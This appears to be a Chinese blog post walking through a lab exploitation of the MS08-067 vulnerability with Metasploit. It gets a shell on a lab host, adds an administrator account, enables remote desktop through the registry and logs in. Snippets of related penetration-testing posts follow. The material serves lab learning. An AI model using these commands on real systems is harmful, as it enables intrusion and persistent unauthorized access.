滲透實驗1

2021-10-01 23:23:07 字數 819 閱讀 9297

msf > search ms08-067

搜尋ms08-067相關漏洞的攻擊模組

使用剛才搜尋到的漏洞

msf exploit(ms08_067_netapi) > set rhost 192.168.191.129

設定要攻擊的目標主機ip

msf exploit(ms08_067_netapi) > exploit

發起攻擊

meterpreter > shell

對目標主機進行命令列控制

c:\windows\system32>

c:\windows\system32>net user root 123456 /add

給自己建立1個新使用者,root,密碼123456

c:\windows\system32>net localgroup administrators root /add

給自己的使用者提權,加入管理員組

reg add hklm\system\currentcontrolset\control\terminal" "server /v fdenytsconnections /t reg_dword /d 00000000 /f

通過編輯登錄檔,開啟目標主機的遠端桌面功能

root@kali:~# rdesktop -a 16 192.168.147.131

另外開1個視窗,通過遠端桌面登入目標主機

滲透測試 許可權提公升實驗

已經獲得了普通使用者許可權 普通使用者new 使用background命令暫時退出session2,使用post multi recon local exploit suggester來利用已獲得的普通賬號,得到目標靶機中的更多漏洞資訊 由前面結果得到一些可能存在的漏洞,選擇乙個漏洞進行利用 配置引...

內網滲透 內網滲透測試基礎 1

內網也指區域網 local area network 是指在某一區域內由多台計算機互聯而成的計算機組,組網範圍通常在數千公尺以內。在區域網中,可以實現檔案管理 應用軟體共享 印表機共享 工作組內的日程安排 電子郵件和傳真通訊服務等。內網是封閉的,可以由辦公室內的兩台計算機組成,也可以由乙個公司內的大...

web滲透學習 1

php反序列化 序列化說通俗點就是把乙個物件變成可以傳輸的字串 class s s new s 建立乙個物件 serialize s 把這個物件進行序列化 序列化後得到的結果是這個樣子的 o 1 s 1 o 代表object 1 代表物件名字長度為乙個字元 s 物件的名稱 1 代表物件裡面有乙個變數...